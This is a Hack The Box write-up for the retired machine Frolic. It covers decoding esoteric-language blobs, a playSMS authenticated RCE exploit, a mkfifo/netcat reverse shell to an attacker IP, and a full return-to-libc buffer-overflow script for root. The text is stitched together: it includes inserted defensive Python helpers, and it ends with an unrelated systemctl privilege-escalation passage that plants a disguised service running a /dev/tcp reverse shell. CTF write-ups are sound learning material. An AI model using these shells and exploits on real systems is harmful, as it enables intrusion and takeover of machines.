
HacktheBox - Retired - Frolic






Recon


Let's start out with a threader3000 scan



Some interesting results here


Ports 22 and 445 aren't uncommon, but 1880 and 9999 are.


Let's let nmap run through these ports.



Option Selection: 1
nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT
Nmap scan report for 10.10.10.111
Host is up (0.060s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA)
|   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA)
|_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
1880/tcp open  http        Node.js (Express middleware)
|_http-title: Node-RED
9999/tcp open  http        nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h39m34s, deviation: 3h10m31s, median: 10m25s
|_nbstat: NetBIOS name: FROLIC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: frolic
|   NetBIOS computer name: FROLIC\x00
|   Domain name: \x00
|   FQDN: frolic
|_  System time: 2021-05-06T01:57:56+05:30
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-05-05T20:27:56
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.50 seconds




This looks like an Ubuntu box, but with Samba? Weird.

A listing shows some shares.



Strange.


Ok, what about those other ports?


1880 says it's HTTP, specifically Node-RED running on Node.js.


9999 says it's nginx


Let's try to browse to them.



On port 1880 we see this:


Node-RED



Ok


What about port 9999?



Just the default nginx page

I ran auto-recon on this box via IP address and it came back with a couple of directories on port 9999, one of which is /admin.




Ok let's check out the source code.



What is that login.js?



Is that a hard coded user/pass?


Yup


Ok but it then redirects to this.





Looks like something encoded, maybe? This looks interesting.


So after some googling I figured out this is a representation of the Ook! programming language. Luckily dcode.fr has a decoder for it.


https://www.dcode.fr/ook-language


The decoding is:



Nothing here check /asdiSIAJJ0QWE9JAS


Ok, let's check out that directory on port 9999.




Another encoded blob:


UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG AAAAAAEAAQBPAAAAAwEAAAAA 



Throwing a bunch of stuff from CyberChef at it, I noticed this in base64:





Could this be the hex of a file?


I saved the hex output from CyberChef.


Looked at it in a hex editor.


It starts with PK, which a quick Google search leads us to:



It might be a .zip file


Ok, let's rename it using mv.



Yay, it is a zip file that looks like it contains index.php. But the thing is password protected.
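The same identification can be done in a few lines of Python instead of CyberChef plus a hex editor. The following is an added example and not code from the write-up: it base64-decodes the blob served at /asdiSIAJJ0QWE9JAS straight to bytes (no hex round trip), checks the leading magic bytes against a small signature table I constructed for this example, parses the zip local file header by hand, and then lets the zipfile module list the entries together with their encryption flag, which is what tells you the archive needs a password before you reach for fcrackzip. The blob is the one from the page above with its line wrapping removed.

```python
import base64
import io
import struct
import zipfile

# A few common file signatures ("magic bytes"); the first match wins.
# Constructed for this example; a real tool would use libmagic / `file`.
MAGIC = [
    (b"PK\x03\x04", "zip (local file header)"),
    (b"PK\x05\x06", "zip (empty archive)"),
    (b"\x7fELF", "elf"),
    (b"\x1f\x8b", "gzip"),
    (b"%PDF-", "pdf"),
    (b"\x89PNG\r\n\x1a\n", "png"),
]


def detect_magic(data):
    """Return the type name for the signature at the start of data, or 'unknown'."""
    for sig, name in MAGIC:
        if data.startswith(sig):
            return name
    return "unknown"


def zip_local_header(data):
    """Parse the first local file header of a zip by hand (PKZIP APPNOTE layout)."""
    if not data.startswith(b"PK\x03\x04"):
        raise ValueError("not a zip local file header")
    (_version, flags, method, _mtime, _mdate, crc, csize, usize,
     name_len, _extra_len) = struct.unpack("<HHHHHIIIHH", data[4:30])
    name = data[30:30 + name_len].decode("utf-8", "replace")
    return {
        "name": name,
        "method": method,                 # 8 = deflate, 0 = stored
        "encrypted": bool(flags & 0x1),   # general purpose bit 0 = traditional PKZIP encryption
        "compressed_size": csize,
        "uncompressed_size": usize,
        "crc32": crc,
    }


def inspect_zip(data):
    """List (name, encrypted, compressed size, uncompressed size) for every entry."""
    entries = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for zi in zf.infolist():
            entries.append((zi.filename, bool(zi.flag_bits & 0x1),
                            zi.compress_size, zi.file_size))
    return entries


# The base64 blob served at /asdiSIAJJ0QWE9JAS, copied from the write-up above.
ZIP_B64 = (
    "UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB"
    "BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs"
    "K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve"
    "EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj"
    "lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC"
    "AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG"
    "AAAAAAEAAQBPAAAAAwEAAAAA"
)


def frolic_zip_bytes():
    """Decode the blob straight to bytes; the default validate=False drops stray whitespace."""
    return base64.b64decode(ZIP_B64)


if __name__ == "__main__":
    blob = frolic_zip_bytes()
    print("type:", detect_magic(blob))
    print("local header:", zip_local_header(blob))
    for name, enc, csize, usize in inspect_zip(blob):
        print("%s encrypted=%s %d -> %d bytes" % (name, enc, csize, usize))
```

The local header and the central directory both carry the encryption bit, so an inspection tool can report "password required" without attempting any decryption; the archive contents are never touched here.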


Let's run it through fcrackzip.



Password is password.



And honestly what do we expect here?


More encoding.




And CyberChef again, converting from hex, gives us what looks like base64 again.






KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr
KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg
K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t
LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==




Which of course gives us something else.



Which is also an esoteric programming language, called brainfuck (Ook! is just a re-encoding of it).


dcode.fr to the rescue again.


https://www.dcode.fr/brainfuck-language



idkwhatispass



Well, at least it's not encoded anymore. I'm assuming this is the password for something.
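Both dcode.fr lookups (the Ook! program behind login.js and the brainfuck program inside index.php) can be replaced by one small interpreter. The code below is an added example, not code from the write-up: Ook! is a one-to-one re-encoding of brainfuck, so a translation table plus a brainfuck interpreter decodes both. The Ook! program itself is not reproduced on the page, so the Ook! inputs used for self-testing are constructed; the brainfuck base64 blob is the one shown above, and running it yields the same idkwhatispass. The interpreter bounds its step count so that a blob copied off a web page cannot spin it forever.

```python
import base64

# Ook! is a one-to-one re-encoding of brainfuck: every pair of Ook words
# is exactly one brainfuck command, so a single interpreter handles both.
OOK_TO_BF = {
    "Ook. Ook?": ">", "Ook? Ook.": "<", "Ook. Ook.": "+", "Ook! Ook!": "-",
    "Ook! Ook.": ".", "Ook. Ook!": ",", "Ook! Ook?": "[", "Ook? Ook!": "]",
}


def ook_to_brainfuck(src):
    """Translate an Ook! program into brainfuck; unknown pairs raise ValueError."""
    words = src.split()
    if len(words) % 2:
        raise ValueError("Ook! programs have an even number of words")
    out = []
    for i in range(0, len(words), 2):
        pair = words[i] + " " + words[i + 1]
        if pair not in OOK_TO_BF:
            raise ValueError("not an Ook! word pair: %r" % pair)
        out.append(OOK_TO_BF[pair])
    return "".join(out)


def run_brainfuck(src, stdin=b"", max_steps=1000000):
    """Run a brainfuck program and return everything it prints as a str.

    Characters other than the eight commands (spaces, newlines) are ignored,
    cells are 8-bit and wrap, and max_steps bounds runaway loops.
    """
    code = [c for c in src if c in "<>+-.,[]"]
    # Pre-compute matching brackets so jumps are O(1) and mismatches are
    # reported before anything runs.
    jump, stack = {}, []
    for pos, c in enumerate(code):
        if c == "[":
            stack.append(pos)
        elif c == "]":
            if not stack:
                raise ValueError("unmatched ] at command %d" % pos)
            start = stack.pop()
            jump[start], jump[pos] = pos, start
    if stack:
        raise ValueError("unmatched [ at command %d" % stack[-1])

    tape = bytearray(30000)
    ptr = pc = steps = 0
    out = bytearray()
    inp = list(stdin)
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded")
        c = code[pc]
        if c == ">":
            ptr += 1
        elif c == "<":
            ptr -= 1
        elif c == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif c == ".":
            out.append(tape[ptr])
        elif c == ",":
            tape[ptr] = inp.pop(0) if inp else 0
        elif c == "[" and tape[ptr] == 0:
            pc = jump[pc]
        elif c == "]" and tape[ptr] != 0:
            pc = jump[pc]
        if not 0 <= ptr < len(tape):
            raise IndexError("tape pointer left the tape")
        pc += 1
    return out.decode("latin-1")


# The base64 blob CyberChef produced from the hex inside index.php (copied
# from the write-up above, line breaks removed).
BF_B64 = (
    "KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr"
    "KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg"
    "K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t"
    "LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg=="
)


def decode_frolic_blob():
    """Base64-decode the blob and run the brainfuck program it contains."""
    program = base64.b64decode(BF_B64).decode("ascii")
    return run_brainfuck(program)


if __name__ == "__main__":
    print(decode_frolic_blob())
```

Running the file prints idkwhatispass, the same result dcode.fr returned. Because the bracket table is built before execution, an unbalanced program is rejected with a ValueError instead of running off the end of the code.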



It didn't work for the Node-RED login. Let's throw dirb at the two ports we found with web servers to see if we can come up with another place to log in.



Dirb found this directory:





Which looks like it points to another directory, /playsms.






Which is asking for a login. Let's try admin and the decoded password we got.




That worked.


What is playSMS?



Ok



A Google search for vulns shows this GitHub repo for an authenticated RCE (CVE-2017-9101).


https://github.com/jasperla/CVE-2017-9101


Let's give it a shot.





Exploit



Looks like it works!


python3 ./POC.py --username admin --password idkwhatispass --url http://10.10.10.111:9999/playsms/ --command 'id'  



Let's get a shell with this.


Let's change it to interactive mode.



python3 ./POC.py --username admin --password idkwhatispass --url http://10.10.10.111:9999/playsms/ -i   



After some working with this I couldn't get a shell to stay open; it would die immediately after connecting. To get around this,


I made an rs.sh file in /tmp/circusmonkey and used echo to fill it with my command:


echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.20 5555 >/tmp/f' > /tmp/circusmonkey/rs.sh


And then I used the 'interactive' POC to give that file execution rights and called it.



And now we have a better shell to figure out our priv esc in.


Contents of user.txt and password.txt from /var/www/html/backup




LinPEAS shows an interesting SUID binary:


In /home/ayush/.binary/rop




It looks like it just echoes whatever is thrown at it back in a message.


First, let's take a look at the binary to see if any protections are in place.


ASLR is not enabled on the box.


What about the NX bit on the binary?


checksec ./rop




Well, that sucks: the stack is marked non-executable (NX is enabled), so we can't just drop shellcode onto the stack and get execution. We will have to use another method to get our shell.



The file output shows it to be a 32-bit binary.
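checksec and file read these properties straight out of the ELF headers, and the same checks are easy to script when auditing a fleet for SUID binaries built without protections. The following is an added example, not the author's tooling: it parses the ELF header and program headers with the struct module, reports the word size, whether the PT_GNU_STACK segment is marked executable (NX off) and whether the binary is position independent (PIE), and reads the randomize_va_space sysctl that the ASLR check above relies on. The build_test_elf helper produces a constructed, minimal ELF purely for self-testing; the rop binary itself is not on the page.

```python
import struct
import sys

PT_GNU_STACK = 0x6474E551   # program header that records the requested stack permissions
PF_X = 0x1
ET_EXEC, ET_DYN = 2, 3      # fixed-address executable vs. position-independent (PIE)


def elf_protections(data):
    """Report the properties checksec/file show for an ELF image given as bytes.

    Returns {"bits": 32|64, "nx": bool, "pie": bool}. NX is read from the
    PT_GNU_STACK header: if that segment is marked executable, or the header
    is missing altogether, nx is reported False (checksec does the same).
    """
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class = data[4]
    if ei_class == 1:        # ELFCLASS32: e_type@16, e_machine@18, e_version@20, e_entry@24, e_phoff@28
        bits = 32
        e_type, _machine, _version, _entry, e_phoff = struct.unpack_from("<HHIII", data, 16)
        e_phentsize, e_phnum = struct.unpack_from("<HH", data, 42)
        phdr_fmt = "<IIIIIIII"   # p_type, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_flags, p_align
        flags_index = 6
    elif ei_class == 2:      # ELFCLASS64: e_entry/e_phoff are 8 bytes and p_flags sits after p_type
        bits = 64
        e_type, _machine, _version, _entry, e_phoff = struct.unpack_from("<HHIQQ", data, 16)
        e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
        phdr_fmt = "<IIQQQQQQ"   # p_type, p_flags, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_align
        flags_index = 1
    else:
        raise ValueError("unknown ELF class %d" % ei_class)

    stack_header_seen = False
    stack_exec = False
    for i in range(e_phnum):
        ph = struct.unpack_from(phdr_fmt, data, e_phoff + i * e_phentsize)
        if ph[0] == PT_GNU_STACK:
            stack_header_seen = True
            stack_exec = bool(ph[flags_index] & PF_X)
    return {"bits": bits, "nx": stack_header_seen and not stack_exec, "pie": e_type == ET_DYN}


def aslr_status(path="/proc/sys/kernel/randomize_va_space"):
    """Kernel ASLR sysctl: 0 = off, 1 = stack/mmap/vdso randomised, 2 = brk too; None if unreadable."""
    try:
        with open(path) as f:
            return int(f.read().strip())
    except (OSError, ValueError):
        return None


def build_test_elf(bits, e_type, stack_flags):
    """Constructed minimal ELF (header + one PT_GNU_STACK entry) used only for self-testing."""
    if bits == 32:
        ehdr = struct.pack("<4sBBBBB7xHHIIIIIHHHHHH", b"\x7fELF", 1, 1, 1, 0, 0,
                           e_type, 3, 1, 0, 52, 0, 0, 52, 32, 1, 40, 0, 0)
        phdr = struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)
    else:
        ehdr = struct.pack("<4sBBBBB7xHHIQQQIHHHHHH", b"\x7fELF", 2, 1, 1, 0, 0,
                           e_type, 62, 1, 0, 64, 0, 0, 64, 56, 1, 64, 0, 0)
        phdr = struct.pack("<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)
    return ehdr + phdr


if __name__ == "__main__":
    # Usage: python3 elfcheck.py /path/to/binary (falls back to the constructed sample)
    target = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(target, "rb").read() if target else build_test_elf(32, ET_EXEC, 0x6)
    print(elf_protections(data))
    print("randomize_va_space =", aslr_status())
```

A 32-bit, non-PIE binary with nx True and randomize_va_space 0 is exactly the combination the write-up finds: the stack cannot hold shellcode, but every libc address is the same on every run.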



Let's see if we can overflow it.


./rop $(python -c 'print "A"*500')



We sure can. Let's try to exploit it, following this return-to-libc walkthrough:


https://niiconsulting.com/checkmate/2019/09/exploiting-buffer-overflow-using-return-to-libc/



Let's use nc to copy this file over to our Kali box to see if we can craft a BOF exploit for it.



New listener on Kali:

nc -lnvp 5566 > rop



Send it from Frolic:

nc 10.10.14.20 5566 < ./rop



Let's load the file up in gdb.


If you don't already have PEDA installed for gdb, install it from here:


https://github.com/longld/peda


Launch gdb:


gdb


Set the file:


file ./rop



Now we test just to make sure it runs like we think.



Good, let's try to crash it again in gdb:


gdb-peda$ r $(python2 -c "print 'A'*500")





Yup. Let's find the offset.



First, let's use pattern_create to make a unique pattern we can then search for the offset with:


pattern_create 500 buffer


This creates a file named buffer with a unique string of 500 characters.


Then we just feed that file named buffer into ./rop:



r $(cat buffer)




And now we can use pattern_offset to find the offset.


I kept having problems here with this large a pattern; I couldn't find the offset, so I dropped it down to 100.


pattern_create 100 buffer




Then use pattern_offset to search for "AAGA":




So our offset is 52.


Let's try to send 52 A's followed by 4 B's to see if we overwrite $eip with B's:


r $(python2 -c "print 'A'*52 + 'B'*4")



Good, that worked; we can control $eip.


Ok, now we need to figure out all the addresses we need to do a return-to-libc attack on this binary.


Start out by finding the libc version/location:


ldd rop

Base b7e19000


Next we need to find the offset of the /bin/sh string in libc:



15ba0b


Then we need to find the offsets of system and exit:



System

003ada0



Exit

0002e9d0


Ok, we have what we need to exploit this thing:


Base 0xb7e19000

/bin/sh  0x0015ba0b

System 0x0003ada0

Exit 0x0002e9d0


Now we just need to build a Python script that will combine all these for us:


import struct

# Values from ldd and the libc symbol lookups above: libc base plus the offsets
base = 0xb7e19000
binsh = 0x0015ba0b
syst = 0x0003ada0
exit_off = 0x0002e9d0   # renamed so the Python builtin exit() is not shadowed

# Pack each absolute address as a 32-bit little-endian value
syst_final = struct.pack("<I", base + syst)
binsh_final = struct.pack("<I", base + binsh)
exit_final = struct.pack("<I", base + exit_off)

# 52 bytes of padding reach the saved return address, then the ret2libc chain:
# return into system(), with exit() as its return address and "/bin/sh" as its argument
buff = "A" * 52
buff += syst_final
buff += exit_final
buff += binsh_final
print buff



Save all this to a Python script; I named it frolic.py on Frolic.


Then run ./rop calling this script:


./rop $(python /tmp/circusmonkey/frolic.py)



We are root!


Now we can just grab our flag and submit it.



Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The